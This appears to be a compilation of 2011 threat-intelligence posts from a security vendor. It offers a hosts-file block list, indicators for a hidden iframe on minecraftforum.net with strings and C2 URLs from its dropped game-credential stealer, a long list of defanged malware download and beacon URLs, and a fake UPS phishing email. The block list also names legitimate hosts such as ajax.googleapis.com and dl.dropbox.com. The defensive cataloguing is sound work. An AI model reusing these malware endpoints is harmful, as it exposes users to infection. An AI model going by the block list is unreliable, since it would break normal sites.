Hosts friendly data to insert in the file C:\WINDOWS\system32\drivers\etc\hosts to block the domains:

Insert URL:
 
127.0.0.1 195.189.226.104
127.0.0.1 outkxmkcxkxqqmy.org
127.0.0.1 poohfsngrxnlnkr.net
127.0.0.1 poohfsngrxnlnkr.biz
127.0.0.1 oyjqvypmksfasmet.info
127.0.0.1 kastakasta.info
127.0.0.1 flowersinamew.com
127.0.0.1 zz.cdbeta.com
127.0.0.1 vip.cdbeta.com
127.0.0.1 ajax.googleapis.com
127.0.0.1 www.cdbeta.com
127.0.0.1 psfk.com
127.0.0.1 resetmymemory.com
127.0.0.1 worldmotoblo.com
127.0.0.1 zonedg.com
127.0.0.1 focotricot.zapto.org
127.0.0.1 rinaldo.vallecchi.sites.uol.com.br
127.0.0.1 pathla.notlong.com
127.0.0.1 dl.dropbox.com
127.0.0.1 greenherbalteaonline.com
127.0.0.1 wwwmediaportal.com
127.0.0.1 the.veee.googlepages.com
127.0.0.1 3512456308488421436-a-1802744773732722657-s-sites.googlegroups.com
127.0.0.1 data.fuskbugg.se
127.0.0.1 e3bea872ae.in
127.0.0.1 150d064880.com
127.0.0.1 184.171.168.194
127.0.0.1 feed.bizzclick.com
127.0.0.1 74.117.177.149
127.0.0.1 grupolarepublica.dyndns-pics.com
127.0.0.1 wnejjzzh.cn
127.0.0.1 bentseather.be.funpic.de
127.0.0.1 chillly.ch.ohost.de
127.0.0.1 www.pr0.net
127.0.0.1 nqjmyrrrmvxrunr.info
127.0.0.1 nqjmyrrrmvxrunr.com
127.0.0.1 tjybqpmnodvvjekq.biz
127.0.0.1 freshmediaportal.com
127.0.0.1 monochrom.at
127.0.0.1 fastblogportal.com
127.0.0.1 ns-soares.sites.uol.com.br
127.0.0.1 coolmediaportal.com
127.0.0.1 nationsautoelectric.com
127.0.0.1 onlineinstitute.com
127.0.0.1 calaculat.com
127.0.0.1 file4exchange.com
127.0.0.1 78.189.218.14
127.0.0.1 28chejil.com

URLVoid Reports:

http://www.ipvoid.com/scan/195.189.226.104
http://www.urlvoid.com/scan/outkxmkcxkxqqmy.org
http://www.urlvoid.com/scan/poohfsngrxnlnkr.net
http://www.urlvoid.com/scan/poohfsngrxnlnkr.biz
http://www.urlvoid.com/scan/oyjqvypmksfasmet.info
http://www.urlvoid.com/scan/kastakasta.info
http://www.urlvoid.com/scan/flowersinamew.com
http://www.urlvoid.com/scan/zz.cdbeta.com
http://www.urlvoid.com/scan/vip.cdbeta.com
http://www.urlvoid.com/scan/ajax.googleapis.com
http://www.urlvoid.com/scan/www.cdbeta.com
http://www.urlvoid.com/scan/psfk.com
http://www.urlvoid.com/scan/resetmymemory.com
http://www.urlvoid.com/scan/worldmotoblo.com
http://www.urlvoid.com/scan/zonedg.com
http://www.urlvoid.com/scan/focotricot.zapto.org
http://www.urlvoid.com/scan/rinaldo.vallecchi.sites.uol.com.br
http://www.urlvoid.com/scan/pathla.notlong.com
http://www.urlvoid.com/scan/dl.dropbox.com
http://www.urlvoid.com/scan/greenherbalteaonline.com
http://www.urlvoid.com/scan/wwwmediaportal.com
http://www.urlvoid.com/scan/the.veee.googlepages.com
http://www.urlvoid.com/scan/3512456308488421436-a-1802744773732722657-s-sites.googlegroups.com
http://www.urlvoid.com/scan/data.fuskbugg.se
http://www.urlvoid.com/scan/e3bea872ae.in
http://www.urlvoid.com/scan/150d064880.com
http://www.ipvoid.com/scan/184.171.168.194
http://www.urlvoid.com/scan/feed.bizzclick.com
http://www.ipvoid.com/scan/74.117.177.149
http://www.urlvoid.com/scan/grupolarepublica.dyndns-pics.com
http://www.urlvoid.com/scan/wnejjzzh.cn
http://www.urlvoid.com/scan/bentseather.be.funpic.de
http://www.urlvoid.com/scan/chillly.ch.ohost.de
http://www.urlvoid.com/scan/www.pr0.net
http://www.urlvoid.com/scan/nqjmyrrrmvxrunr.info
http://www.urlvoid.com/scan/nqjmyrrrmvxrunr.com
http://www.urlvoid.com/scan/tjybqpmnodvvjekq.biz
http://www.urlvoid.com/scan/freshmediaportal.com
http://www.urlvoid.com/scan/monochrom.at
http://www.urlvoid.com/scan/fastblogportal.com
http://www.urlvoid.com/scan/ns-soares.sites.uol.com.br
http://www.urlvoid.com/scan/coolmediaportal.com
http://www.urlvoid.com/scan/nationsautoelectric.com
http://www.urlvoid.com/scan/onlineinstitute.com
http://www.urlvoid.com/scan/calaculat.com
http://www.urlvoid.com/scan/file4exchange.com
http://www.ipvoid.com/scan/78.189.218.14
http://www.urlvoid.com/scan/28chejil.com

Hidden Iframe in MineCraftForum.Net

Users have reported us another website infected by an hidden iframe:

hxxp://www.minecraftforum.net/

All web pages are affected!

Here is an image of the hidden iframe at the bottom of the HTML pages:

Image

When I visted the infected website, NoVirusThanks EXE Radar Pro has displayed an alert of an unknown executable that tried to run in the system:

C:\Documents and Settings\User\Local Settings\Temp\scvhost.exe

Report date: 2011-06-22 11:34:41 (GMT 1)
File name: scvhost-exe
File size: 18944 bytes
MD5 hash: 5e71723d34d10648ed880af8e564f63b
SHA1 hash: 1af3dcb235e0a16eb58cebdbc0b9fb6316dc2f3b
Detection rate: 0 on 5 (0%)
Status: CLEAN

Thanks to NoVirusThanks EXE Radar Pro, I was able to block and delete the unknown and malicious executable file, preventing the system from being infected.

Some ASCII strings extracted from the PE file:

Type: ASCII
RVA: 00006CE2
Offset: 000040E2
Size: 0000000D
Value: GuardCore.dll
 
Type: ASCII
RVA: 00006EBC
Offset: 000042BC
Size: 00000024
Value: hxxp://www.dashangu.com/new/getw.asp
 
Type: ASCII
RVA: 00006EFF
Offset: 000042FF
Size: 00000006
Value: server
 
Type: ASCII
RVA: 00006F14
Offset: 00004314
Size: 0000000E
Value: WTF\Config.wtf
 
Type: ASCII
RVA: 00006F24
Offset: 00004324
Size: 0000000A
Value: realmName 
 
Type: ASCII
RVA: 00006F35
Offset: 00004335
Size: 00000005
Value: Right
 
Type: ASCII
RVA: 00006F4C
Offset: 0000434C
Size: 00000024
Value: hxxp://www.dashangu.com/new/getr.asp
 
Type: ASCII
RVA: 00006F74
Offset: 00004374
Size: 00000011
Value: JAGEXLAUNCHER.EXE
 
Type: ASCII
RVA: 00006F88
Offset: 00004388
Size: 00000007
Value: WOW.EXn
 
Type: ASCII
RVA: 00006F90
Offset: 00004390
Size: 00000007
Value: WinInet

URLVoid domain analysis:

http://www.urlvoid.com/scan/minecraftforum.net

16:38PM UPDATE:

The website looks like to be in maintenance now, so probably it will be fixed soon.

Recent Malware URLs captured by NoVirusThanks Sandbox

These URLs are malicious or related to malware:

hxxp://caperiod.com/pxxko/ndrei.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/wjwjwaobfs.php?adv=adv401&id=1626783411&c=203332757
hxxp://getpersgd09.com/persgd09/setup.php?track_id=30046
hxxp://gopersgd09.com/install/?track_id=30046
hxxp://carefinder.com.au/inf.php
hxxp://scr4zy.webcindario.com/2/infects.php
hxxp://elmejorbonche.com/dns
hxxp://photopath.in/8797hkj9jk9j778kj9h78k9jh.php?ini=v22MnDTkT9enCDVl61YdHLJrOeDmJ4Q6O41eH
hxxp://www.easyenco.co.kr/module/program/media_codec.exe
hxxp://www.easyenco.co.kr/module/count.asp?exec=media_codec.exe
hxxp://www.easyenco.co.kr/module/count_live.asp?exec=media_codec.exe
hxxp://c0re.su/panel/config.bin
hxxp://ck4.nucleardiscover.com:88/p6.asp?MAC=%MAC%&Publicer=100
hxxp://201.25.28.9/mail/images/info.php
hxxp://startfaredata.in/o54p6ipo546ipo6.php?ini=v22MnDTkT9enCDVl61YdHLJrOeDmJ4Q6O41eH
hxxp://tecnp.h19.ru/in.php
hxxp://www.cplnn.com/bbcount.php?action=knock&build=sp1
hxxp://www.cplnn.com/wad/init3.php?build=
hxxp://mmm-2011.co.uk/setup2683.exe
hxxp://mmm-2011.co.uk/ka.exe
hxxp://cekcuc.ru/z/kilka.bin
hxxp://up1.free-sms.co.kr/main/free07/smsupsetting.dat
hxxp://up1.free-sms.co.kr/main/free07/smsins.exe
hxxp://up1.free-sms.co.kr/main/free07/smsdat.dat
hxxp://up1.free-sms.co.kr/upapp/free07/eventex.exe
hxxp://free-sms.co.kr/app_count/install_count.php?&pid=free07&mac=%MAC%
hxxp://up1.free-sms.co.kr/main/free07/free-sms.exe
hxxp://up1.free-sms.co.kr/main/free07/uninst.exe
hxxp://up1.free-sms.co.kr/main/free07/free-sms.ico
hxxp://up1.free-sms.co.kr/main/free07/smsupv.exe
hxxp://ppppnipponp.r7m.us/cgi-bin/p.cgi
hxxp://flashpile.in/90ds8c9ds8c9d0s8cds.php?ini=v22MnDTkT9enCDVl61YdHLJrOeDmJ4Q6O41eHy
hxxp://neframeofwork.com/gud/hig.op
hxxp://ad.ring3.info/Config.asp
hxxp://ad.ring3.info/Count/Count.asp
hxxp://www.bbsv.nl/files/cache/.../contador.php
hxxp://firstresour.web135.discountasp.net/.sys.php?action=fbgen&v=1
hxxp://shellybeachskiboatclub.co.za/.sys.php?action=fbgen&v=1
hxxp://shellybeachskiboatclub.co.za/.sys.php?action=aolsbm&v=1&hardid=%HDID%&id=0
hxxp://blognote.by/f/fn.txt
hxxp://www.caesar.sk/downloads/getc/getc.php
hxxp://114.200.199.251/apsuy.php
hxxp://iring4u.co.kr/bcklist.php
hxxp://ad79.co.kr/prex/newb/apsuo.exe
hxxp://114.200.199.251/b5ains.php?mac=%MAC%&ip=%LANIP%&pid=&setup=1
hxxp://114.200.199.251/b5aliveins.php?mac=%MAC%&ip=%LANIP%&pid=&app=
hxxp://caperiod.com/pxxko/iwwnnrvi.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/klppp.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/sftkxkb.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/cpptuxlpc.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/oyppct.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/obcptx.php?adv=adv401&id=1626783411&c=203332757
hxxp://gamafotolembranca.com.br/masters/byte.gif
hxxp://gamafotolembranca.com.br/masters/mega.gif
hxxp://gamafotolembranca.com.br/masters/tera.gif
hxxp://www.basedeclientes.com.br/versao_px.txt
hxxp://myck.nucleardiscover.com:88/p6.asp?MAC=%MAC%&Publicer=100
hxxp://celinhaz.sites.uol.com.br/autor2.jpg
hxxp://www.avisosbaladabelemhh.com.br/files/j1/inf/arq.php
hxxp://caperiod.com/pxxko/xxobo.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/pcppgk.php?adv=adv401&id=1626783411&c=203332757
hxxp://webmail.imicro.com.br/SQL/cashkey.gif
hxxp://searcham.org/404.php?type=stats&affid=527&subid=02&iruns
hxxp://w.nucleardiscover.com:888/list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B&v=2&t=0,5870172
hxxp://ru.coolnuff.com:2011/myck.jpg?t=0,1209528
hxxp://w.nucleardiscover.com:888/sn.php?c=C1DF13F78111F6528E63540E077DCF0C0&t=0,8235895
hxxp://w.nucleardiscover.com:888/sn.php?c=4D535BBF44D4BC186F82F8A2A1DB468528B&t=0,2664606
hxxp://58.150.174.222/baz001.jpg?t=0,4474756
hxxp://w.nucleardiscover.com:888/sn.php?c=B9A76E8AC252E133E3FEAAF11C54E417E770B&t=0,1963922
hxxp://w.nucleardiscover.com:888/sn.php?c=9D83997D1A8A28FA809D6239A9E1FF0CAB3C0&t=0,1260797
hxxp://searchattention.org/404.php?type=stats&affid=531&subid=01&iruns
hxxp://www.easyenco.co.kr/module/program/nvsvc32.exe
hxxp://www.easyenco.co.kr/module/count.asp?exec=nvsvc32.exe
hxxp://www.easyenco.co.kr/module/count_live.asp?exec=nvsvc32.exe
hxxp://caperiod.com/pxxko/jjnaeei.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/gqquulypp.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/gggklycc.php?adv=adv401&code1=JNN0&code2=5103
hxxp://www.ilonexs.de/envio/gds32.dll
hxxp://www.familiennavigator.de/components/com_kunena/template/igt.php
hxxp://qd6170.91mt.com/asp/xg.asp
hxxp://qd6170.91mt.com/exe/key2/key_0605.exe
hxxp://key.91mt.com/newkey.php
hxxp://rh508.91mt.com/tj.asp?id=1
hxxp://ups.1gb.ru/services6.exe
hxxp://ekobit.com.pl/cls/Output.exe
hxxp://xn.bisque110.com/yt.php
hxxp://xn.bisque110.com/lf
hxxp://122.770304123.cn/1.gif
hxxp://122.770304123.cn/ue000/38sw.e?uid=162678341112952317322438
hxxp://110.770304123.cn/1.gif
hxxp://110.770304123.cn/player/blog.updata?v=1.1.8.1&r1=0009a83babc21d46591d009e616da91a&tm=2011-06-12%2003:55:28&os=Windows%20XP.2600%20with%20Service%20Pack%202&uid=002678341112952317328300&cht=0
hxxp://caperiod.com/pxxko/gggklycc.php?adv=adv401&code1=GO00&code2=0200&id=102678
hxxp://coursu.com/admin22/server[php]/config.bin
hxxp://ad79.co.kr/fie/sningal.exe
hxxp://114.200.199.251/fie/statins.php?mac=%MAC%&compare=%MAC%&ip=%LANIP%&pid=&install=1
hxxp://114.200.199.251/fie/liveins.php?mac=%MAC%&ip=%LANIP%&pid=
hxxp://iring4u.co.kr/favorbutton.php
hxxp://face-herault.org/images/ads/info.php
hxxp://lkrgn.ivepointedya.com/webyx/settings.cfg?build=501&os=XP
hxxp://network.emloud.com/webyx/iLog.php?dl=5.0&log=Loader%205.0%20~%20Ran
hxxp://consolewaspogad.com/czl/zlo.cl
hxxp://icvaircl.cn/dll/44.dll
hxxp://icvaircl.cn/stat.php?w=44&i=a7157a4db6097a4d51eacb5987fd206c&a=2
hxxp://icvaircl.cn/update.db
hxxp://icvaircl.cn/stat.php?w=44&i=a7157a4db6097a4d51eacb5987fd206c&a=4
hxxp://icvaircl.cn/stat.php?w=44&i=a7157a4db6097a4d51eacb5987fd206c&a=9
hxxp://icvaircl.cn/stat.php?w=44&i=a7157a4db6097a4d51eacb5987fd206c&a=11
hxxp://xylahavowi.com/1023000112
hxxp://caperiod.com/pxxko/gggklycc.php?adv=adv401&code1=JOM0&code2=4203
hxxp://jennifermusic.nl/logo2.jpg
hxxp://caperiod.com/pxxko/gggklycc.php?adv=adv401&code1=JOP0&code2=7203
hxxp://fastsearchportal.org/cfg/miniav.psd
hxxp://fastsearchportal.org/cfg/stopav.psd
hxxp://fastsearchportal.org/cfg/passw.psd
hxxp://fastsearchportal.org/pyvcu.php3
hxxp://fastsearchportal.org/ungtsmsuopstfsjjxaqhpksdi.phtml
hxxp://fastsearchportal.org/mccmkbawzojuijhsyttn.inc
hxxp://fastsearchportal.org/onqyofrbc.phtm
hxxp://myavava.in/90ds8c9ds8c9d0s8cds.php?ini=v22MnDTkT9enCDVl61YdHLJrOeDmJ4Q6O41eHyF2e
hxxp://clashjamwallop.in/90ds8c9ds8c9d0s8cds.php?ini=v22MnDTkT9enCDVl61YdHLJrO
hxxp://adordota.com/bandwidth.bin
hxxp://einemenge.info/webpanel/alive.php?key=grills22&pcuser=%PCUSER%&pcname=%PCNAME%&hwid=%HWID%&country=Italy
hxxp://caperiod.com/pxxko/gggklycc.php?adv=adv401&code1=KOR0&code2=9204
hxxp://JOSEMORAISTA.net/Machine.jpg
hxxp://JOSEMORAISTA.net/andeikyu.jpg
hxxp://mariadacoceicaopraxedes.net/GetString.aspx
hxxp://mariadacoceicaopraxedes.net/Query.aspx
hxxp://98.158.182.229/~milhomem/ver.txt?20110612045029
hxxp://mariadacoceicaopraxedes.net/COMCTL32.OCA.zip
hxxp://s350098374.onlinehome.us/mys.ini
hxxp://rmhpzusmfhtpnt.biz/news/?s=167674
hxxp://axvkxnuutylqdtu.com/news/?s=90742
hxxp://outoszjfvqtyonk.net/news/?s=24872
hxxp://114.200.199.251/vanir.php
hxxp://114.200.199.251/b7ins.php?mac=%MAC%&ip=%LANIP%&pid=vanir&setup=1
hxxp://114.200.199.251/b7liveins.php?mac=%MAC%&ip=%LANIP%&pid=vanir&app=
hxxp://privatesystem-softshieldprotect.com/favicon.ico?0=78&1=4&2=2&3=80&4=i-s
hxxp://212.150.164.204/flash/flashplayer.jpg
hxxp://www.increasingly.kr/Module/gomserv.exe
hxxp://www.increasingly.kr/Module/count.html?exec=gomserv.exe&instFile=gomserv.exe
hxxp://www.increasingly.kr/Module/count_live.html?exec=gomserv.exe
hxxp://windoslive.hotmail.ru/090043043543034877799.exe
hxxp://searchbehind.org/404.php?type=stats&affid=531&subid=03&iruns
hxxp://mygateforex.co.za/.sys.php?action=fbgen&v=1
hxxp://richardwiggers.com/.sys.php?action=fbgen&v=1
hxxp://www.obi-labs.com/.sys.php?action=fbgen&v=1
hxxp://www.obi-labs.com/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=0
hxxp://rvl.it/.sys.php?action=fbgen&v=1
hxxp://www.irishpub.fo/.sys.php?action=fbgen&v=1
hxxp://lets-exoticpets.co.za/.sys.php?action=fbgen&v=1
hxxp://lets-exoticpets.co.za/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=1
hxxp://slcsc.co.uk/.sys.php?action=fbgen&v=1
hxxp://voodoobarbcue.com/.sys.php?action=fbgen&v=1
hxxp://voodoobarbcue.com/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=2
hxxp://robertjakobsen.com/.sys.php?action=fbgen&v=1
hxxp://crosslinkhk.com/.sys.php?action=fbgen&v=1
hxxp://skybluephoto.com/.sys.php?action=fbgen&v=1
hxxp://3mates.com/.sys.php?action=fbgen&v=1
hxxp://3mates.com/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=3
hxxp://www.crabapplesound.com/.sys.php?action=fbgen&v=1
hxxp://www.crabapplesound.com/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=4
hxxp://kidnet.co.il/.sys.php?action=fbgen&v=1
hxxp://gulko.co.za/.sys.php?action=fbgen&v=1
hxxp://shieldteens.co.za/.sys.php?action=fbgen&v=1
hxxp://wcw.co.za/.sys.php?action=fbgen&v=1
hxxp://wcw.co.za/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=5
hxxp://pflco.com/.sys.php?action=fbgen&v=1
hxxp://pflco.com/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=6
hxxp://my-mobility.co.za/.sys.php?action=fbgen&v=1
hxxp://wcw.co.za/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=7
hxxp://emergencyshelter.us/.sys.php?action=fbgen&v=1
hxxp://emergencyshelter.us/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=8
hxxp://www.aandedoorns.co.za/.sys.php?action=fbgen&v=1
hxxp://ad79.co.kr/prex/taurus/taurus.exe
hxxp://ad79.co.kr/dico/sDico.exe
hxxp://ad79.co.kr/prex/taurus/staurus.exe
hxxp://114.200.199.251/version2.php
hxxp://114.200.199.251/statins.php?mac=%MAC%&compare=%MAC%&ip=%LANIP%&pid=taurus&install=1
hxxp://iring4u.co.kr/dico/dico.php
hxxp://iring4u.co.kr/dico/statins.php?mac=%MAC%&compare=%MAC%&ip=%LANIP%&pid=&install=1
hxxp://114.200.199.251/liveins.php?mac=%MAC%&ip=%LANIP%&pid=taurus
hxxp://iring4u.co.kr/dico/liveins.php?mac=%MAC%&ip=%LANIP%&pid=
hxxp://pc-guarrantor-utility.com/favicon.ico?0=80&1660=0&2=1&3000=82&4000=i-s
hxxp://key.91mt.com/diykey.php
hxxp://limpidoscomercio.com.br/GetString.aspx
hxxp://limpidoscomercio.com.br/Query.aspx
hxxp://98.158.182.229/~milhomem/ver.txt?20110612141104
hxxp://limpidoscomercio.com.br/COMCTL32.OCA.zip
hxxp://limpidoscomercio.com.br/COMCTL32.OCX.zip
hxxp://petchaburi.kr/kwd/hkwd.php
hxxp://petchaburi.kr/kwd/dkwd.php
hxxp://petchaburi.kr/check/check.php?m=b
hxxp://64.31.58.237/brn.txt
hxxp://64.31.58.237/brn.php
hxxp://key.91mt.com/list/getpmnum.asp?id=f9435d25636a746f
hxxp://key.91mt.com/list/getpmnum2.asp?id=f9435d25636a746f
hxxp://114.200.199.251/ngliveins.php?pmac=0&lmac=%MAC%&ip=%LANIP%&pid=taurus
hxxp://www.hyap98.com/123/mh.txt
hxxp://www.hyap98.com/123/rx.txt
hxxp://www.hyap98.com/123/wc.txt
hxxp://www.hyap98.com/123/wm.txt
hxxp://www.hyap98.com/123/wow.txt
hxxp://w.nucleardiscover.com:888/sn.php?c=DCC228CCD04021858368C8936B1023D74A8&t=9,005374E-02
hxxp://w.nucleardiscover.com:888/sn.php?c=18064AAE3FAF34908C67CC976A11E317&t=0,3627588
hxxp://searcham.org/404.php?type=stats&affid=531&subid=03&iruns
hxxp://s350098374.onlinehome.us/update.php
hxxp://key.91mt.com/list/getpmnum.asp?id=e69ec59abbe3c794
hxxp://key.91mt.com/list/getpmnum2.asp?id=e69ec59abbe3c794
hxxp://key.91mt.com/list/clickpm.asp?id=e69ec59abbe3c794
hxxp://key.91mt.com/list/getpmnum.asp?id=fa67a8111002230d
hxxp://key.91mt.com/list/getpmnum2.asp?id=fa67a8111002230d
hxxp://98.158.182.229/~milhomem/ver.txt?20110612154053
hxxp://ck3.nucleardiscover.com:88/p6.asp?MAC=%MAC%&Publicer=100
hxxp://w.nucleardiscover.com:888/sn.php?c=948A7D999D0D9733C5285903F882FB388219AB9DA&t=0,894787
hxxp://w.nucleardiscover.com:888/sn.php?c=E1FF76924BDB00A47B96A8F2F18B995A4AD1A593F&t=0,5531122
hxxp://58.150.174.222/baz001.jpg?t=0,8852045
hxxp://131207db062d.dynazzy.net/get2.php?c=TCBIJIJK&d=26606B67393437333F2F676268307D3F22202323
hxxp://w.nucleardiscover.com:888/sn.php?c=4E5018FC71E12DFFD2CFCA91DB93&t=0,2665522
hxxp://w.nucleardiscover.com:888/sn.php?c=1F01DE3AC95905D70C11B&t=0,5650751
hxxp://ru.coolnuff.com:2011/ck3.jpg?t=0,4463007
hxxp://w.nucleardiscover.com:888/sn.php?c=3B25E90DC1513CEEB45CC6EB96EEC230&t=0,7814447
hxxp://w.nucleardiscover.com:888/sn.php?c=918FA94D78E873A13CD4E5C8502&t=0,8195307
hxxp://ru.coolnuff.com:2011/ck4.jpg?t=0,3862421
hxxp://w.nucleardiscover.com:888/sn.php?c=F8E65FBB45D53793A54EFCA7C5BEEB&t=0,3606684
hxxp://xylahavowi.com/1023000112
hxxp://tekefihamib.com/10230001124255461742
hxxp://tekefihamib.com/buy.html

URLVoid domain analysis:

http://www.urlvoid.com/scan/caperiod.com
http://www.urlvoid.com/scan/getpersgd09.com
http://www.urlvoid.com/scan/gopersgd09.com
http://www.urlvoid.com/scan/carefinder.com.au
http://www.urlvoid.com/scan/scr4zy.webcindario.com
http://www.urlvoid.com/scan/elmejorbonche.com
http://www.urlvoid.com/scan/photopath.in
http://www.urlvoid.com/scan/easyenco.co.kr
http://www.urlvoid.com/scan/c0re.su
http://www.urlvoid.com/scan/ck4.nucleardiscover.com
http://www.urlvoid.com/scan/201.25.28.9
http://www.urlvoid.com/scan/startfaredata.in
http://www.urlvoid.com/scan/tecnp.h19.ru
http://www.urlvoid.com/scan/cplnn.com
http://www.urlvoid.com/scan/mmm-2011.co.uk
http://www.urlvoid.com/scan/cekcuc.ru
http://www.urlvoid.com/scan/up1.free-sms.co.kr
http://www.urlvoid.com/scan/free-sms.co.kr
http://www.urlvoid.com/scan/ppppnipponp.r7m.us
http://www.urlvoid.com/scan/flashpile.in
http://www.urlvoid.com/scan/neframeofwork.com
http://www.urlvoid.com/scan/ad.ring3.info
http://www.urlvoid.com/scan/bbsv.nl
http://www.urlvoid.com/scan/firstresour.web135.discountasp.net
http://www.urlvoid.com/scan/shellybeachskiboatclub.co.za
http://www.urlvoid.com/scan/blognote.by
http://www.urlvoid.com/scan/caesar.sk
http://www.ipvoid.com/scan/114.200.199.251
http://www.urlvoid.com/scan/iring4u.co.kr
http://www.urlvoid.com/scan/ad79.co.kr
http://www.urlvoid.com/scan/gamafotolembranca.com.br
http://www.urlvoid.com/scan/basedeclientes.com.br
http://www.urlvoid.com/scan/myck.nucleardiscover.com
http://www.urlvoid.com/scan/celinhaz.sites.uol.com.br
http://www.urlvoid.com/scan/avisosbaladabelemhh.com.br
http://www.urlvoid.com/scan/webmail.imicro.com.br
http://www.urlvoid.com/scan/searcham.org
http://www.urlvoid.com/scan/w.nucleardiscover.com
http://www.urlvoid.com/scan/ru.coolnuff.com
http://www.ipvoid.com/scan/58.150.174.222
http://www.urlvoid.com/scan/searchattention.org
http://www.urlvoid.com/scan/ilonexs.de
http://www.urlvoid.com/scan/familiennavigator.de
http://www.urlvoid.com/scan/qd6170.91mt.com
http://www.urlvoid.com/scan/key.91mt.com
http://www.urlvoid.com/scan/rh508.91mt.com
http://www.urlvoid.com/scan/ups.1gb.ru
http://www.urlvoid.com/scan/ekobit.com.pl
http://www.urlvoid.com/scan/xn.bisque110.com
http://www.urlvoid.com/scan/122.770304123.cn
http://www.urlvoid.com/scan/110.770304123.cn
http://www.urlvoid.com/scan/coursu.com
http://www.urlvoid.com/scan/face-herault.org
http://www.urlvoid.com/scan/lkrgn.ivepointedya.com
http://www.urlvoid.com/scan/network.emloud.com
http://www.urlvoid.com/scan/consolewaspogad.com
http://www.urlvoid.com/scan/icvaircl.cn
http://www.urlvoid.com/scan/xylahavowi.com
http://www.urlvoid.com/scan/jennifermusic.nl
http://www.urlvoid.com/scan/fastsearchportal.org
http://www.urlvoid.com/scan/myavava.in
http://www.urlvoid.com/scan/clashjamwallop.in
http://www.urlvoid.com/scan/adordota.com
http://www.urlvoid.com/scan/einemenge.info
http://www.urlvoid.com/scan/JOSEMORAISTA.net
http://www.urlvoid.com/scan/mariadacoceicaopraxedes.net
http://www.ipvoid.com/scan/98.158.182.229
http://www.urlvoid.com/scan/s350098374.onlinehome.us
http://www.urlvoid.com/scan/rmhpzusmfhtpnt.biz
http://www.urlvoid.com/scan/axvkxnuutylqdtu.com
http://www.urlvoid.com/scan/outoszjfvqtyonk.net
http://www.urlvoid.com/scan/privatesystem-softshieldprotect.com
http://www.ipvoid.com/scan/212.150.164.204
http://www.urlvoid.com/scan/increasingly.kr
http://www.urlvoid.com/scan/windoslive.hotmail.ru
http://www.urlvoid.com/scan/searchbehind.org
http://www.urlvoid.com/scan/mygateforex.co.za
http://www.urlvoid.com/scan/richardwiggers.com
http://www.urlvoid.com/scan/obi-labs.com
http://www.urlvoid.com/scan/rvl.it
http://www.urlvoid.com/scan/irishpub.fo
http://www.urlvoid.com/scan/lets-exoticpets.co.za
http://www.urlvoid.com/scan/slcsc.co.uk
http://www.urlvoid.com/scan/voodoobarbcue.com
http://www.urlvoid.com/scan/robertjakobsen.com
http://www.urlvoid.com/scan/crosslinkhk.com
http://www.urlvoid.com/scan/skybluephoto.com
http://www.urlvoid.com/scan/3mates.com
http://www.urlvoid.com/scan/crabapplesound.com
http://www.urlvoid.com/scan/kidnet.co.il
http://www.urlvoid.com/scan/gulko.co.za
http://www.urlvoid.com/scan/shieldteens.co.za
http://www.urlvoid.com/scan/wcw.co.za
http://www.urlvoid.com/scan/pflco.com
http://www.urlvoid.com/scan/my-mobility.co.za
http://www.urlvoid.com/scan/emergencyshelter.us
http://www.urlvoid.com/scan/aandedoorns.co.za
http://www.ipvoid.com/scan/114.200.199.251
http://www.urlvoid.com/scan/pc-guarrantor-utility.com
http://www.urlvoid.com/scan/limpidoscomercio.com.br
http://www.urlvoid.com/scan/petchaburi.kr
http://www.ipvoid.com/scan/64.31.58.237
http://www.urlvoid.com/scan/hyap98.com
http://www.urlvoid.com/scan/ck3.nucleardiscover.com
http://www.urlvoid.com/scan/131207db062d.dynazzy.net
http://www.urlvoid.com/scan/tekefihamib.com

Malware: United Parcel Service notification #46034

Suspicious email spreading malware:

Return-Path: <info52943@ups.com>
Received: from [39.203.6.87] (account 1361@ms21.hinet.net HELO ybydypsmsb.cehflcrileuz.ru)
From: "United Parcel Service" <info52943@ups.com>
Subject: United Parcel Service notification #46034

Message:

May 2011United Parcel Servicetracking number #18203 Good morningParcel
notificationThe parcel was sent your home adress.And it will arrive within 3 
buisness days. More information and the parcel tracking number are attached in
document below.Thank you United Parcel Service of America (c)153 James Street,
Suite100, Long Beach CA, 90000

Attached there is a file with ZIP extension:

Report date: 2011-06-14 11:44:18 (GMT 1)
File name: ups-document-zip
File size: 9032 bytes
MD5 hash: 4e8bbc81f8a1ed3fcde3899546fef0c9
SHA1 hash: 56e4f46e75cbccf27dde19289250471ebb90c5ba
Detection rate: 4 on 5 (80%)
Status: INFECTED

AVG 14/06/2011 10.0.0.1190 FakeAlert
Avira AntiVir 14/06/2011 7.11.7.12 TR/Crypt.XPACK.Gen
ClamAV 14/06/2011 0.97 Suspect.Bredozip-zippwd-10
Emsisoft 14/06/2011 5.1.0.2 Trojan-Downloader.Win32.Chepvil!IK

The extracted file is an executable file:

Report date: 2011-06-14 11:44:18 (GMT 1)
File name: ups-document-exe
File size: 24576 bytes
MD5 hash: fed91182ed9d29e36bbabac211ac7d3a
SHA1 hash: 17f308da31c8d61dd0b33691bf474e6f6fb5afbe
Detection rate: 2 on 5 (40%)
Status: INFECTED

Avira AntiVir 14/06/2011 7.11.7.12 TR/Crypt.XPACK.Gen
Emsisoft 14/06/2011 5.1.0.2 Trojan-Downloader.Win32.Chepvil!IK

Report created by NoVirusThanks Automated Sandbox:

